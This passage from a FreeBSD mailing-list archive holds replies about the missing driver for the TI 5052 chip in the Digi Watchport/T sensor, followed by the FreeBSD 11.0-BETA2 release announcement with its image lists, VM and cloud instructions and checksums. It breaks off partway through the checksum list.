probably not working. The ugensa driver has nothing chip > -specific in it, it's for accessing devices which can do bulk > read/write without needing to configure any of the other serial comms > parameters. The ugensa driver works with things like gps receivers > that have simple text-only interfaces. > > I think these watchport devices will likely need real serial comms > configuration -- baud rate at least, to even be able to talk to them. > In other words, freebsd needs a real driver for TI 5052 chips. It > looks like a fairly complete datasheet for the chip is available (but I > don't have time to write a driver myself). > > -- Ian > There are several different USB serial drivers. Off-hand I see ubser, ubsa, uchcom, ucom, ucycom, uftdi, ubgensa, umcs, umct, umoscom, uplcom, usb_serial, uslcom, and uvscom. Whether any of these will support the TI chip, I can't say. Most have man pages, but a few, as has been noted, are lacking one. -- Kevin Oberman, Part time kid herder and retired Network Engineer E-mail: rkoberman@gmail.com PGP Fingerprint: D03FB98AFA78E3B78C1694B318AB39EF1B055683 From owner-freebsd-current@freebsd.org Sun Jul 24 18:52:42 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id D060ABA1CF2 for ; Sun, 24 Jul 2016 18:52:42 +0000 (UTC) (envelope-from wlosh@bsdimp.com) Received: from mail-io0-x22b.google.com (mail-io0-x22b.google.com [IPv6:2607:f8b0:4001:c06::22b]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 95F871192 for ; Sun, 24 Jul 2016 18:52:42 +0000 (UTC) (envelope-from wlosh@bsdimp.com) Received: by mail-io0-x22b.google.com with SMTP id 38so145145127iol.0 for ; Sun, 24 Jul 2016 11:52:42 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=bsdimp-com.20150623.gappssmtp.com; s=20150623; h=mime-version:sender:in-reply-to:references:from:date:message-id :subject:to:cc; bh=fHQWafWE/nnTQWULDBYQjyFAEVeOII5E0Vgdr2Ho+Qw=; b=X6JSAqbgMWgHRdsNhWh/hZDru7zEkcdw5mQitPQPQstHspnSKDC8vbIcBgLEL3ZSDT F/DzdlZ0ZVQNFW/o37xkxUN3khKoCTup2/siiCdp/B4b8YCFpdZduT68TwCBTG7s4xr1 nOtx+CEZh0AZbujLdjWA+q13Gzyd2NrGwDhZAqoA2Tit1l+Dy0jMyHI+2uef1+Xtzpyz nbFyAybUTbP5Tx7TElMNfELDz/FLJoo54Bn3r4WAy4iy2dXZ+uSBFEtI2+GntT+AwjHH 9okNZDvOrdbJxdWkdZjELdMSQHDP2Ac0eJqB8lN1Cabx9IcgsLMZgFHsjug6x9EHJvHj Ev/w== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:sender:in-reply-to:references:from :date:message-id:subject:to:cc; bh=fHQWafWE/nnTQWULDBYQjyFAEVeOII5E0Vgdr2Ho+Qw=; b=KMILBAmd9H4N6WKr0oJNUrRD8SMqmp9Rb4kbMNlxPtU86jsSkfa5h4egW8CCVvSjUT vjbZVSMbV/GZSt1dhjNzZb3II+kZwFcUWy7PMTNEleVlhoEKT2otT4fv+Adge8IPy7Ly b5/kcUnPBIa6VI1wYEvfUGE7FIX1/3qgWe0HjZWhhZsNSG+j3UWSdaeM/iBeMbCvFz8c bsPoPNCzI2StU+ubAxQvnx1k5kIzMApzfrYFmDgBQp4ZmEyqDeqUEn60DdXEU4B8J4FO iZW/4q/lEMBicU32eEovkR1vIhUa+/5b+VCtBHFIGEV0TiOZmb8ERZzd5kccB0iVfu9u HhvQ== X-Gm-Message-State: AEkoouuP7LyWmnb2mwTQhXmYgo1+VK0Z2CWMAiwCJwmVNd8dKtIsAbHGAVaCkGUHr3iDceR2j3BiSKkmNHjjfA== X-Received: by 10.107.40.133 with SMTP id o127mr15931566ioo.183.1469386361825; Sun, 24 Jul 2016 11:52:41 -0700 (PDT) MIME-Version: 1.0 Sender: wlosh@bsdimp.com Received: by 10.79.137.131 with HTTP; Sun, 24 Jul 2016 11:52:41 -0700 (PDT) X-Originating-IP: [50.253.99.174] In-Reply-To: References: <20160722183556.2fc39fd7.ohartman@zedat.fu-berlin.de> <1469206374.84197.14.camel@freebsd.org> <20160723220430.34ce02fe.ohartman@zedat.fu-berlin.de> <1469306951.84197.31.camel@freebsd.org> <20160724080330.3a27e875.ohartman@zedat.fu-berlin.de> <20160724083859.4c0dd392@ernst.home> <20160724105134.184f0b7f.ohartman@zedat.fu-berlin.de> <1469379334.84197.40.camel@freebsd.org> From: Warner Losh Date: Sun, 24 Jul 2016 12:52:41 -0600 X-Google-Sender-Auth: Xf-fUTjYm0fb7Ps7eK1otRDjVSM Message-ID: Subject: Re: Digi Watchport/T temperature sensor as /dev/ttyU To: Kevin Oberman Cc: Ian Lepore , FreeBSD CURRENT , "O. Hartmann" , "freebsd-usb@FreeBSD.org" Content-Type: text/plain; charset=UTF-8 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 24 Jul 2016 18:52:42 -0000 On Sun, Jul 24, 2016 at 12:42 PM, Kevin Oberman wrote: > There are several different USB serial drivers. Off-hand I see ubser, ubsa, > uchcom, ucom, ucycom, uftdi, ubgensa, umcs, umct, umoscom, uplcom, > usb_serial, uslcom, and uvscom. Whether any of these will support the TI > chip, I can't say. Most have man pages, but a few, as has been noted, are > lacking one. I tried to automate discovery of these things. However, the only way you can really know for sure about the TI chip is to read it's datasheet and compare that with extant drivers. It's actually easier than it sounds. I've often thought of unification of the TTY USB drivers, since they are most (but not all) based on the standard plus extra bits. Warner From owner-freebsd-current@freebsd.org Sun Jul 24 19:12:39 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 0BF66BA2132 for ; Sun, 24 Jul 2016 19:12:39 +0000 (UTC) (envelope-from ian@freebsd.org) Received: from outbound1b.ore.mailhop.org (outbound1b.ore.mailhop.org [54.200.247.200]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id DBFFB1956 for ; Sun, 24 Jul 2016 19:12:38 +0000 (UTC) (envelope-from ian@freebsd.org) X-MHO-User: b6b52ae4-51d2-11e6-a0ff-e511cd071b9b X-Report-Abuse-To: https://support.duocircle.com/support/solutions/articles/5000540958-duocircle-standard-smtp-abuse-information X-Originating-IP: 73.34.117.227 X-Mail-Handler: DuoCircle Outbound SMTP Received: from ilsoft.org (unknown [73.34.117.227]) by outbound1.ore.mailhop.org (Halon Mail Gateway) with ESMTPSA; Sun, 24 Jul 2016 19:13:32 +0000 (UTC) Received: from rev (rev [172.22.42.240]) by ilsoft.org (8.15.2/8.14.9) with ESMTP id u6OJCZ5e014060; Sun, 24 Jul 2016 13:12:35 -0600 (MDT) (envelope-from ian@freebsd.org) Message-ID: <1469387555.84197.48.camel@freebsd.org> Subject: Re: Digi Watchport/T temperature sensor as /dev/ttyU From: Ian Lepore To: Warner Losh , Kevin Oberman Cc: FreeBSD CURRENT , "O. Hartmann" , "freebsd-usb@FreeBSD.org" Date: Sun, 24 Jul 2016 13:12:35 -0600 In-Reply-To: References: <20160722183556.2fc39fd7.ohartman@zedat.fu-berlin.de> <1469206374.84197.14.camel@freebsd.org> <20160723220430.34ce02fe.ohartman@zedat.fu-berlin.de> <1469306951.84197.31.camel@freebsd.org> <20160724080330.3a27e875.ohartman@zedat.fu-berlin.de> <20160724083859.4c0dd392@ernst.home> <20160724105134.184f0b7f.ohartman@zedat.fu-berlin.de> <1469379334.84197.40.camel@freebsd.org> Content-Type: text/plain; charset="us-ascii" X-Mailer: Evolution 3.16.5 FreeBSD GNOME Team Port Mime-Version: 1.0 Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 24 Jul 2016 19:12:39 -0000 On Sun, 2016-07-24 at 12:52 -0600, Warner Losh wrote: > On Sun, Jul 24, 2016 at 12:42 PM, Kevin Oberman > wrote: > > There are several different USB serial drivers. Off-hand I see > > ubser, ubsa, > > uchcom, ucom, ucycom, uftdi, ubgensa, umcs, umct, umoscom, uplcom, > > usb_serial, uslcom, and uvscom. Whether any of these will support > > the TI > > chip, I can't say. Most have man pages, but a few, as has been > > noted, are > > lacking one. > > I tried to automate discovery of these things. However, the only way > you can really know for sure about the TI chip is to read it's > datasheet > and compare that with extant drivers. It's actually easier than it > sounds. > > I've often thought of unification of the TTY USB drivers, since they > are > most (but not all) based on the standard plus extra bits. > > Warner To reiterate: we do not have a driver for TI 5052 chips. It's not much like other usb-serial chips. In fact it's not strictly a usb-serial chip, it's a multifunction chip that includes a software -controllable usb hub, 2 serial ports, gpio, an i2c bus master, an MCU interface, a multichannel DMA controller, and apparently even has the ability to download your own 8052-compatible microcontroller code into the 5052 and have it take over from the built-in rom code. It would be reasonable enough to write a driver that initially supported only the uart part of the chip. -- Ian From owner-freebsd-current@freebsd.org Sun Jul 24 19:25:25 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id E7510BA2A17; Sun, 24 Jul 2016 19:25:25 +0000 (UTC) (envelope-from gjb@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:1900:2254:206c::16:87]) by mx1.freebsd.org (Postfix) with ESMTP id DAA151503; Sun, 24 Jul 2016 19:25:25 +0000 (UTC) (envelope-from gjb@FreeBSD.org) Received: from FreeBSD.org (freefall.freebsd.org [IPv6:2001:1900:2254:206c::16:87]) by freefall.freebsd.org (Postfix) with ESMTP id 87F441E6D; Sun, 24 Jul 2016 19:25:25 +0000 (UTC) (envelope-from gjb@FreeBSD.org) Date: Sun, 24 Jul 2016 19:25:23 +0000 From: Glen Barber To: freebsd-current@FreeBSD.org, freebsd-stable@FreeBSD.org, freebsd-snapshots@FreeBSD.org Cc: FreeBSD Release Engineering Team Subject: FreeBSD 11.0-BETA2 Now Available Message-ID: <20160724192523.GA94659@FreeBSD.org> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; x-action=pgp-signed X-Operating-System: FreeBSD 11.0-CURRENT amd64 X-SCUD-Definition: Sudden Completely Unexpected Dataloss X-SULE-Definition: Sudden Unexpected Learning Event X-PEKBAC-Definition: Problem Exists, Keyboard Between Admin/Computer User-Agent: Mutt/1.5.24 (2015-08-30) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 24 Jul 2016 19:25:26 -0000 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 The second BETA build of the 11.0-RELEASE release cycle is now available. Installation images are available for: o 11.0-BETA2 amd64 GENERIC o 11.0-BETA2 i386 GENERIC o 11.0-BETA2 powerpc GENERIC o 11.0-BETA2 powerpc64 GENERIC64 o 11.0-BETA2 sparc64 GENERIC o 11.0-BETA2 armv6 BANANAPI o 11.0-BETA2 armv6 BEAGLEBONE o 11.0-BETA2 armv6 CUBIEBOARD o 11.0-BETA2 armv6 CUBIEBOARD2 o 11.0-BETA2 armv6 CUBOX-HUMMINGBOARD o 11.0-BETA2 armv6 GUMSTIX o 11.0-BETA2 armv6 RPI-B o 11.0-BETA2 armv6 RPI2 o 11.0-BETA2 armv6 PANDABOARD o 11.0-BETA2 armv6 WANDBOARD o 11.0-BETA2 aarch64 GENERIC Note regarding arm/armv6 images: For convenience for those without console access to the system, a freebsd user with a password of freebsd is available by default for ssh(1) access. Additionally, the root user password is set to root, which it is strongly recommended to change the password for both users after gaining access to the system. Installer images and memory stick images are available here: ftp://ftp.freebsd.org/pub/FreeBSD/releases/ISO-IMAGES/11.0/ The image checksums follow at the end of this e-mail. If you notice problems you can report them through the Bugzilla PR system or on the -stable mailing list. If you would like to use SVN to do a source based update of an existing system, use the "stable/11" branch. A summary of changes since 11.0-BETA1 includes: o Several build-/toolchain-related fixes. o WITNESS and INVARIANTS have been disabled on powerpc/powerpc64 and arm/armv6 architectures. o freebsd-update(8) has been updated to allow '*-dbg' distribution sets. o ctld(8) no longer exits when reloading the configuration with invalid initiator-portal clauses. o GENERIC-NODEBUG kernel configurations have been removed. o The callout code has been updated to avoid a system panic with TCP timers. o Several other changes. A list of changes since 10.0-RELEASE are available on the stable/11 release notes: https://www.freebsd.org/relnotes/11-STABLE/relnotes/article.html Please note, the release notes page is not yet complete, and will be updated on an ongoing basis as the 11.0-RELEASE cycle progresses. === Virtual Machine Disk Images === VM disk images are available for the amd64 and i386 architectures. Disk images may be downloaded from the following URL (or any of the FreeBSD FTP mirrors): ftp://ftp.freebsd.org/pub/FreeBSD/releases/VM-IMAGES/11.0-BETA2/ The partition layout is: ~ 16 kB - freebsd-boot GPT partition type (bootfs GPT label) ~ 1 GB - freebsd-swap GPT partition type (swapfs GPT label) ~ 20 GB - freebsd-ufs GPT partition type (rootfs GPT label) The disk images are available in QCOW2, VHD, VMDK, and raw disk image formats. The image download size is approximately 135 MB and 165 MB respectively (amd64/i386), decompressing to a 21 GB sparse image. Note regarding arm64/aarch64 virtual machine images: a modified QEMU EFI loader file is needed for qemu-system-aarch64 to be able to boot the virtual machine images. See this page for more information: https://wiki.freebsd.org/arm64/QEMU To boot the VM image, run: % qemu-system-aarch64 -m 4096M -cpu cortex-a57 -M virt \ -bios QEMU_EFI.fd -serial telnet::4444,server -nographic \ -drive if=none,file=VMDISK,id=hd0 \ -device virtio-blk-device,drive=hd0 \ -device virtio-net-device,netdev=net0 \ -netdev user,id=net0 Be sure to replace "VMDISK" with the path to the virtual machine image. === Amazon EC2 AMI Images === FreeBSD/amd64 EC2 AMIs are available in the following regions: us-east-1 region: ami-684bc37f us-west-1 region: ami-2592d345 us-west-2 region: ami-210cc041 sa-east-1 region: ami-511b8f3d eu-west-1 region: ami-3d12704e eu-central-1 region: ami-92f80cfd ap-northeast-1 region: ami-355ba354 ap-northeast-2 region: ami-edef2583 ap-southeast-1 region: ami-789d421b ap-southeast-2 region: ami-1a81ab79 === Vagrant Images === FreeBSD/amd64 images are available on the Hashicorp Atlas site, and can be installed by running: % vagrant init freebsd/FreeBSD-11.0-BETA2 % vagrant up Note to freebsd-update(8) consumers: An EN for earlier FreeBSD releases is required before upgrading to 11.0-BETA2 will work properly, so it is advised to wait until the ENs are published before attempting an upgrade via freebsd-update(8). == ISO CHECKSUMS == o 11.0-BETA2 amd64 GENERIC: SHA512 (FreeBSD-11.0-BETA2-amd64-bootonly.iso) = a9bb4b98001e783c71b7d1f046a5dacf2cf992f5d3baa7dcba0ea0aaaafdb126421f43509757a794562661200ed6abb8a72c671d7968c2b9f64c660e10f9a094 SHA512 (FreeBSD-11.0-BETA2-amd64-bootonly.iso.xz) = 92d6faa8b1c3c19fae79d42c3c39e01b9e0a41bf726c6c8218c545f057a26b18440dcae530326881781918165f0197f28a1c634bee00352627fd0e0ad6c6f497 SHA512 (FreeBSD-11.0-BETA2-amd64-disc1.iso) = f0287f3062ecf22d88f2d24e7093009a6036165d1b05bc6824407494d4452b4868635874b4c921f9f62621b797e11876348c29d9f3be21bec800145d5250e7dc SHA512 (FreeBSD-11.0-BETA2-amd64-disc1.iso.xz) = 58615d59cc5af2032cffb588281d2bbe8e7cffe05585fc58f3ec5eb2f084866e91a87a05b15185a1fbacabbb062176a27ecc4dd7bae24190cf4cee7c0828002b SHA512 (FreeBSD-11.0-BETA2-amd64-dvd1.iso) = 6af2edc64620c4e91d6dbdcea8f532118f2a12934523fc5e331a7a86ee374c71703b0d82f9964b8d28eb77918d8b1fb0f2690de8a040ce2066fc36917431fc38 SHA512 (FreeBSD-11.0-BETA2-amd64-dvd1.iso.xz) = 468764188290a2206bac5138f62ca6779de1fb634807a6b220841979df0eb1053bbb96ad8a4b36fda2770e6c75e7c78103eb72ed4533c91da3672954d57b9f58 SHA512 (FreeBSD-11.0-BETA2-amd64-memstick.img) = a5cec97933e621db45df9c7471fe237daae00c4147d084363e6625f25ce109086029c7c78ee122edcaeb9d228a9d24a81bf54b0155c66dd614331466eb4d20dd SHA512 (FreeBSD-11.0-BETA2-amd64-memstick.img.xz) = 17f560214a861cd3d4eb8c065465d3201f71b2b52bf5546e5b91b145779d0458e9eb8d412eb57da6f27af72391071637289436084b20a5c18208544f73719dec SHA512 (FreeBSD-11.0-BETA2-amd64-mini-memstick.img) = ea620830b801ae97f5300974eccee4fc72a883e81b0ccd26767f0ead478aa9e0003125fb05fb96044e99574fe4ef957a5cdfb7d0fb0511068ea007bb46b6595f SHA512 (FreeBSD-11.0-BETA2-amd64-mini-memstick.img.xz) = b1e9bcb1f6d8be187724f2889014d9b832ce693b4e91c9f1e03aa683e68f2c10947957222d969f3761437e77d3d1509c31134c1d4e085fce6d36c58df843d290 SHA256 (FreeBSD-11.0-BETA2-amd64-bootonly.iso) = 2d5059befc71ab713b5a1e91eae97e179f075cdf9d65e164951382c986ae3408 SHA256 (FreeBSD-11.0-BETA2-amd64-bootonly.iso.xz) = c5fee5793e83169a0e72978905ba2d468351022391fa7dcd448746e4be1403bb SHA256 (FreeBSD-11.0-BETA2-amd64-disc1.iso) = 74490ca260ca544edb8956d72cf23b82650b7578569945a6a690a9a346cebfd7 SHA256 (FreeBSD-11.0-BETA2-amd64-disc1.iso.xz) = 21e5b7beae939cb83443f8a15b41dcca4e218b2070cf99bf34442e3bc8f36022 SHA256 (FreeBSD-11.0-BETA2-amd64-dvd1.iso) = e925286eabccc95f4139709a3de3f4d812257eefed5151d983885afc2e0055c0 SHA256 (FreeBSD-11.0-BETA2-amd64-dvd1.iso.xz) = 1f8108cde27c60e4ee47c2c769dec4a6117664b3c74c2a297b8725fb4385975f SHA256 (FreeBSD-11.0-BETA2-amd64-memstick.img) = 2e68b5a4fbcf724fc3be731bf70b5f67ba4f1c150ed013b96d16617801701c35 SHA256 (FreeBSD-11.0-BETA2-amd64-memstick.img.xz) = 7baadb1155ece581c7d0ba0eb4109566767c8afe0b8e4cb34e8459500b1b43ba SHA256 (FreeBSD-11.0-BETA2-amd64-mini-memstick.img) = 3ddd0ae09bda3d65419da370cf596a96e6f2d8dbe6af2448e076c8d36032ba11 SHA256 (FreeBSD-11.0-BETA2-amd64-mini-memstick.img.xz) = 338db28352e4f7599dc64f52ea093da7e76b7db763828948755a4ad346e117de o 11.0-BETA2 i386 GENERIC: SHA512 (FreeBSD-11.0-BETA2-i386-bootonly.iso) = 81b2c5111da60ef8373ad8b176a4f99b5a6ccca883e40ad6f2d99e60bc62004817b714dc39d2954be70f794ee32c09be0a675d85da199e316e5a836a43408301 SHA512 (FreeBSD-11.0-BETA2-i386-bootonly.iso.xz) = 0256763cf9fe3b0477c3e8dc512eba39040109705bf5e64949014a647ff6f8428da3977be6fe4e6161d7ec0fc3b3568730a62302c59e8b86826686f574aad7c0 SHA512 (FreeBSD-11.0-BETA2-i386-disc1.iso) = 4ed4104fe02ba6f629d86748374674d38a54877ac5a2fde3d34d6767d6b43e8ee0f33c2015d4ac172435dec55f1c50a712ff2a84ab5bdaa539788b0aa7adb876 SHA512 (FreeBSD-11.0-BETA2-i386-disc1.iso.xz) = f44ab1f42fee18a681119b6e31539383dbe336b00d5eeaa228a9530108146151a46228f132ae017913c11c7647bde667cd028883e90d20056bf127cb2bd99843 SHA512 (FreeBSD-11.0-BETA2-i386-dvd1.iso) = 17e80925a31314d06b10f58d27152df2077a0e08eb493aa7af151ac53c2402a77d249ca081b911704d27115ba84fe974de7ab32a508659ebecfb2b9bb426c38a SHA512 (FreeBSD-11.0-BETA2-i386-dvd1.iso.xz) = a881a9d545d107098c800dc2c4885e2a62e842ab77423aa82655da81e04fe940cbdb2b84e0b50c2e7d370d2d60189a28179fc57938ebe0b05e8116361e0a65bf SHA512 (FreeBSD-11.0-BETA2-i386-memstick.img) = 286bcf577c2329d20b82202ed955113e0dca8483f65915cf5260b57d403ca83b35fa8328f2100b07c0801ddc97ecfb8b659cd2c88b43cf47c356a713d9cc2309 SHA512 (FreeBSD-11.0-BETA2-i386-memstick.img.xz) = 1d3b709d79e3a147a006e339c42290a1a2bfbffed932f8406f0b2bb88827f4f9307618a35b537559632373ed8443fe8865c7f5c373a073edef527f10f9d15528 SHA512 (FreeBSD-11.0-BETA2-i386-mini-memstick.img) = 3eded6d13a6953b634876b6dae00e53b8bfca7a8a96328959420bb530a10c9ab4cc69a8507defdd51accc867ce138a9b537cbe14bf24852e1ef1b681240d1431 SHA512 (FreeBSD-11.0-BETA2-i386-mini-memstick.img.xz) = 51ea56db2ec344679605a128b022819fa516b1ac4b53280b912014166ffbc429dcc09585a30f8bd4a607a9ac203e0697be7cfc23f757adb7f806877d983429c0 SHA256 (FreeBSD-11.0-BETA2-i386-bootonly.iso) = 5816c18aa103811f905d4bb8bac4444fd8803dfe0b48d8f94f55cd3f0467250e SHA256 (FreeBSD-11.0-BETA2-i386-bootonly.iso.xz) = 57db61c8448115307e3798927e799244afac9cb7f63a9a779f535eab68c2793f SHA256 (FreeBSD-11.0-BETA2-i386-disc1.iso) = 89d84f54489caa430c157e1293db37bd3dab88096159a135cdc0652ec02fb479 SHA256 (FreeBSD-11.0-BETA2-i386-disc1.iso.xz) = a630a027ce5217ef6e5dded767ca895eb9bf15c7e0040a32676ef921043385fb SHA256 (FreeBSD-11.0-BETA2-i386-dvd1.iso) = 1d229cf7ba465e40d66e23213ffe113a83dfd0a46f38f9c61d7782c3f19cd9df SHA256 (FreeBSD-11.0-BETA2-i386-dvd1.iso.xz) = 9e89c21bf730b114b40b4d88c2eb040e3026a62cbcf8d88c0e14df19232d3a7c SHA256 (FreeBSD-11.0-BETA2-i386-memstick.img) = 4175261432d2ad4f6b62ff05b598814681ccbc095c09470f01867d1eb4d86597 SHA256 (FreeBSD-11.0-BETA2-i386-memstick.img.xz) = db37a9bf82e04c82abbc36dd6961dffb4258299d373044bb0660520e7d999844 SHA256 (FreeBSD-11.0-BETA2-i386-mini-memstick.img) = 063040d6a291c2b291f8a7c6de119e7d15686825810e40d710322e2b6f21c9e5 SHA256 (FreeBSD-11.0-BETA2-i386-mini-memstick.img.xz) = 7404e4db9a730e2b2acc7a921e001507691d8680a17fc29fa647fc7631fe1137 o 11.0-BETA2 powerpc GENERIC: SHA512 (FreeBSD-11.0-BETA2-powerpc-bootonly.iso) = 96546a0e7aa19d3425ffee27cf11b62c5dbceff84de7f50310d97a82ef9bea1ece02465d91d309998848bc63b8d678084b4d7142bd4d9a493cef7b6491b1fc62 SHA512 (FreeBSD-11.0-BETA2-powerpc-bootonly.iso.xz) = 35de9a1e9c41e36b66a306595a8d70318c5c6d9fbf92dcbe04471a8acd473c71bcab41fbc9f9911867593633ad1f510d8f777d0a3ab219984fe3fd69f461dec3 SHA512 (FreeBSD-11.0-BETA2-powerpc-disc1.iso) = c5276dd2a49e3d86aa3d72151ee2ea9d35d2eb76ff0ee5200cbb2ec3cdd4b3e0e11087ee9fd3e5bf68929ecf8aa4ee11011ffc9044b3d847fe7f17184f3b1ae4 SHA512 (FreeBSD-11.0-BETA2-powerpc-disc1.iso.xz) = 6bb56412b0d2b3885bc4362a47448a3285787d17630b1184b9593d4600e5dd24c7b1209ceb067f927f78273eedaaec2d5ddab6b85cfb0beb63b469dfdf59f4af SHA512 (FreeBSD-11.0-BETA2-powerpc-memstick.img) = 1def389bc29f546dba33f82f94e3abd582dd983829137cc2b7bd7e363ce346289376f09984bfca0ce516e2e5616ecf53cbe6c14a859fde294fefe0d114dacdda SHA512 (FreeBSD-11.0-BETA2-powerpc-memstick.img.xz) = 5006e3a2b558fb8abf527c545387de0a7a48df24f8063293f5d40d45df7caaa98d908beaa82902be0a67998d81b3a2931fa7435507b8fd2ad20cdb5df31383e3 SHA512 (FreeBSD-11.0-BETA2-powerpc-mini-memstick.img) = 10d4604b466093bc10472393c1f61069f7e8565cdc653b192edcaa99f111bb727e5a4c4a9d54bca1c2f1d5a6344d7aa5b07dde32a58457f6589b02bfd25c1885 SHA512 (FreeBSD-11.0-BETA2-powerpc-mini-memstick.img.xz) = 633e84bba4bd8fad0c0daab16e8ae7ab1b16060c8300718d41dacfc5009589c4237551c655637399c68beb327c04a70ad7382da6c9c0aa2a36d206fc679fa25e SHA256 (FreeBSD-11.0-BETA2-powerpc-bootonly.iso) = 4197c3d7f02106f0144e338e541fec669e35146cfdfdb2fa0433cd868734d805 SHA256 (FreeBSD-11.0-BETA2-powerpc-bootonly.iso.xz) = 2edc68eed8d1f233b6609f2ab1d665bfbabc53b4e56aecae68e8004b818f7d4c SHA256 (FreeBSD-11.0-BETA2-powerpc-disc1.iso) = eaa59f998c9fb8e9801f92c93d493534743792b6695ae8713aa2e05a62d691df SHA256 (FreeBSD-11.0-BETA2-powerpc-disc1.iso.xz) = e4da8f91188f00806ff4f0948a6a40c2e71e639c84a44e9c961c8c94fbd56daf SHA256 (FreeBSD-11.0-BETA2-powerpc-memstick.img) = 107e63252fb0e429361b634857c1db80995a5d77b07f15ea1dd5d97e1320fee2 SHA256 (FreeBSD-11.0-BETA2-powerpc-memstick.img.xz) = 0020a7a994d50f8363e08041418d8f9f0b24293b77cb3aae58f9681873fa1097 SHA256 (FreeBSD-11.0-BETA2-powerpc-mini-memstick.img) = 25b912b0e9f3d9a8743525d52e5d06798840afa27b7ac2c35bfc2483e606e62c SHA256 (FreeBSD-11.0-BETA2-powerpc-mini-memstick.img.xz) = 5ce0cda82565a56ad8a85968d9c959a060787fa4fb542858fe4a32e8a863dd6e o 11.0-BETA2 powerpc64 GENERIC64: SHA512 (FreeBSD-11.0-BETA2-powerpc-powerpc64-bootonly.iso) = fab016ee466def73566f09410d82557c1bd4b581785798dd463efc25446f2278031593256c626abfc635b899127e712ef2c4deb1fe45d901c02beb5ce0f75574 SHA512 (FreeBSD-11.0-BETA2-powerpc-powerpc64-bootonly.iso.xz) = 467e7c832fbea323f9bc234b0d2fb2f79719380d1d5f1e2c129c8c51222d981efd89adfddd2eac870602037ddb69510be95cec01112dfdbc03f69fad3c1078d2 SHA512 (FreeBSD-11.0-BETA2-powerpc-powerpc64-disc1.iso) = f6d77ef45e740ad3f8bb83b5d00d39af2af2cf00353f4ebfb1da43d8185681da91720f2746b5b7bb8cd48de8ae2afa7eb10c889eecda4bb7892ebcd22c0bbb3b SHA512 (FreeBSD-11.0-BETA2-powerpc-powerpc64-disc1.iso.xz) = 45f504cabb6b6920d8b441e7324957de1d8e58130a7fe4ec3eb1118744d2cc22974f4ac7945406b3dcf0342ec9113246641fe389416cd64e01be85c9da2f3b86 SHA512 (FreeBSD-11.0-BETA2-powerpc-powerpc64-memstick.img) = 2d707fd7edf4427348a5e359b8768552b324139b101593a5a5d1940fe5cf794d9ca472a1a31ded6bb63a836c0651ebe0594fb22998e5f2fa62ffedbf647d54ce SHA512 (FreeBSD-11.0-BETA2-powerpc-powerpc64-memstick.img.xz) = aea7ec565b2b9da762357479a029a8c5a2b5b41a6b8b16bd3d75ea4a4a7eae7093b1672ea7fbb82d8a2cd9ef217166ca1bb018498b61631332305afd83a14f05 SHA512 (FreeBSD-11.0-BETA2-powerpc-powerpc64-mini-memstick.img) = 48c17c7ea03da81cda41584784b338fa5b5a4576f79164ad2aed7108594db3c22ba3582515225f8d8273c94d40bf33ebcaa562b17357d859ae902e62b43c6736 SHA512 (FreeBSD-11.0-BETA2-powerpc-powerpc64-mini-memstick.img.xz) = 46a8394cc3016d943bd6730b4dc0476b01af430f3b4c9f776a9f6b44d8265001ca5d1368a192fa004a4f3c7b549f53435d07a9fbf9c4c46310cc9f1024513709 SHA256 (FreeBSD-11.0-BETA2-powerpc-powerpc64-bootonly.iso) = 315d10cb26dbe9d7f282b83db1b54fb49408a00584a5f9f2a8943af0deda4ec7 SHA256 (FreeBSD-11.0-BETA2-powerpc-powerpc64-bootonly.iso.xz) = e4ee97b0ddc495a043dc6a6ef81f2e257de7711ba6ccd2c241917bbc17be7c41 SHA256 (FreeBSD-11.0-BETA2-powerpc-powerpc64-disc1.iso) = 5f124e3a69fce2ed0276cc765b9e42639b601e8a2b73d1b6e484b47747ff93d8 SHA256 (FreeBSD-11.0-BETA2-powerpc-powerpc64-disc1.iso.xz) = e19b9c87f12dacbe0bac4f9ee6038af4bc45c30c3c7eacc2d4f1a4a85658f0d3 SHA256 (FreeBSD-11.0-BETA2-powerpc-powerpc64-memstick.img) = 859fc65391d9129c8d448792e5eceae9c29da9e6b1c95cd74fc4716653440cfe SHA256 (FreeBSD-11.0-BETA2-powerpc-powerpc64-memstick.img.xz) = f9933a1a838a7f3c06e281fbeb95456b374c6f47346f84e6d0ee728f9ee66341 SHA256 (FreeBSD-11.0-BETA2-powerpc-powerpc64-mini-memstick.img) = f6f2ffbe7c70fd30be0280be9dbff6916ea655f4a03d70e3cf9de8f3c2364aa1 SHA256 (FreeBSD-11.0-BETA2-powerpc-powerpc64-mini-memstick.img.xz) = 12b7c45106ff861d96f9aa173c33ee8aa21ab6be7ac990766e35ade3e16cc6cc o 11.0-BETA2 